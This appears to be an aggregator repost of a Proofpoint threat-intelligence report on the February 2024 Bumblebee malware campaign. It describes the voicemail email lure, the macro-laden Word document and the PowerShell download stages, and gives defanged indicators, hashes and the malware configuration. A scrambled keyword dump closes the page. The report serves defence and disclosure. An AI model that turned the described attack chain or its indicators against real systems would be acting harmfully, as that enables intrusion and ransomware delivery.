Source |
ProofPoint |
Identifiant |
8449524 |
Date de publication |
2024-02-13 07:32:08 (vue: 2024-02-13 10:07:57) |
Titre |
Bumblebee bourdonne en noir Bumblebee Buzzes Back in Black |
Texte |
What happened
Proofpoint researchers identified the return of Bumblebee malware to the cybercriminal threat landscape on 8 February 2024 after a four-month absence from Proofpoint threat data. Bumblebee is a sophisticated downloader used by multiple cybercriminal threat actors and was a favored payload from its first appearance in March 2022 through October 2023 before disappearing.
In the February campaign, Proofpoint observed several thousand emails targeting organizations in the United States with the subject "Voicemail February" from the sender "info@quarlesaa[.]com" that contained OneDrive URLs. The URLs led to a Word file with names such as "ReleaseEvans#96.docm" (the digits before the file extension varied). The Word document spoofed the consumer electronics company Humane.
Screenshot of the voicemail-themed email lure.
Screenshot of the malicious Word document.
The document used macros to create a script in the Windows temporary directory, for example "%TEMP%/radD7A21.tmp", using the contents of CustomDocumentProperties SpecialProps, SpecialProps1, SpecialProps2 and SpecialProps3. The macro then executed the dropped file using "wscript".
Inside the dropped temporary file was a PowerShell command that downloads and executes the next stage from a remote server, stored in file “update_ver”:
The next stage was another PowerShell command which in turn downloaded and ran the Bumblebee DLL.
The Bumblebee configuration included:
Campaign ID: dcc3
RC4 Key: NEW_BLACK
It is notable that the actor is using VBA macro-enabled documents in the attack chain, as most cybercriminal threat actors have nearly stopped using them, especially those delivering payloads that can act as initial access facilitators for follow-on ransomware activity. In 2022, Microsoft began blocking macros by default, causing a massive shift in the landscape to attack chains that began using more unusual filetypes, vulnerability exploitation, combining URLs and attachments, chaining scripting files, and much more.
Another noteworthy feature of this campaign is that the attack chain is significantly different from previously observed Bumblebee campaigns. Examples used in prior campaigns that distributed Bumblebee with the “NEW_BLACK” configuration included:
Emails that contained URLs leading to the download of a DLL which, if executed, started Bumblebee.
Emails with HTML attachments that leveraged HTML smuggling to drop a RAR file. If executed, it exploited the WinRAR vulnerability CVE-2023-38831 to install Bumblebee.
Emails with zipped, password-protected VBS attachments which, if executed, used PowerShell to download and execute Bumblebee.
Emails that contained zipped LNK files to download an executable file. If executed, the .exe started Bumblebee.
Out of the nearly 230 Bumblebee campaigns identified since March 2022, only five used any macro-laden content; four campaigns used XL4 macros, and one used VBA macros.
Attribution
At this time Proofpoint does not attribute the activity to a tracked threat actor. The voicemail lure theme, use of OneDrive URLs, and sender address appear to align with previous TA579 activities. Proofpoint will continue to investigate and may attribute this activity to a known threat actor in the future.
Proofpoint assesses with high confidence Bumblebee loader can be used as an initial access facilitator to deliver follow-on payloads such as ransomware.
Why it matters
Bumblebee\'s return to the threat landscape aligns with a surge of cybercriminal threat activity after a notable absence of many threat actors and malware.
Recently, two threat actors-tax-themed actor TA576 and the sophisticated TA866-appeared once again in email campaign data after months-long gaps in activity. Post-exploitation operator TA582 and aviation and aerospace targeting ecrime actor TA2541 both reappeared in the threat landscape in late January after being absent since the end of November. Additionally, DarkGate malware reappeared |
Envoyé |
Oui |
Condensat |
//1drv //213 /radd7a21 08 0cef17ba672793d8e32216240706cf46e3a2894d0e558906a1782405a8f4decf 131/update 131/w 139 144:443 2022 2023 2024 2047946 205 230 2bc95ede5c16f9be01d91e0d7b0231d3c75384c37bfd970d57caca1e2bbe730f 38831 86a7da7c7ed5b915080ad5eaa0fdb810f7e91aa3e86034cbab13c59d3c581c0e absence absent access act active activities activity activity actor actors additionally address aerospace after again align aligns all analysis another anticipated any appear appearance appeared are assesses attachments attack attempts attribute attribution august ausurb5detxugq aviation back bang before began being black black black” blocking both botnet breaks bumblebee buzzes bypass c34e5d36bd3a9a6fca92e900ab015aa50bb20d2cd6c0b6e03d070efe09ee689a campaign campaigns can causing chain chaining chains checkin clusters com combining command company compromise confidence configuration consumer contained content; contents continue create creative customdocumentproperties cve cybercriminal darkgate data dat dcc3 december default deliver delivered delivering description detections different digits directory disappearing disruption distributed dll dll dll” docm document documents does domain dopped download downloaded downloader downloads drop dropped e=9f2plw e=djpgy ecrime electronics email emails email emerging enabled end especially example examples exe executable execute executed executes expecting exploitation exploited extension facilitator facilitators favored feature feb february file files filetypes finally first five folder folder follow four from future gaps had happened has have high html humane hxxp hxxps hziqbbwue1 id: identified included: including indicators indicator info@quarlesaa initial inside install investigate its january key: known laden landscape late latrodectus leading led levels leveraged life lnk loader long lull lure m3jkvlzb19gqa macro macros major malicious malware many march massive matters may microsoft mid month months more most ms/w/s much multiple names nearly new next not notable notably noteworthy november observe observed observed october odvfe off once one onedrive onedrive ongoing only operational operator organizations other out password payload payloads pikabot post powershell previous previously prior proofpoint protected q905hr35 qbot ran ransomware rar rc4 reappearance reappeared recently releaseevans#96 remote researchers return returned returning screenshot script scripting second sender server several sha256 shift signatures significantly since smuggling sophisticated specialprops specialprops1 specialprops2 specialprops3 spoofed stage stage started states stopped stored subject such summer surge ta2541 ta544 ta558 ta571 ta576 ta577 ta579 ta582 ta866 targeting tax temp tempo temporary them theme themed then those thousand threat threats through time tmp tracked turn two unattributed united until unusual update updated url urls use used using varied vba vbs ver version very ver ver”: voicemail vulnerability what which why will win32/bumblebee windows winrar winter word wscript xl4 ya4h zipped “new “update |
Tags |
Ransomware
Malware
Vulnerability
Threat
|
Stories |
|
Notes |
★★
|
Move |
|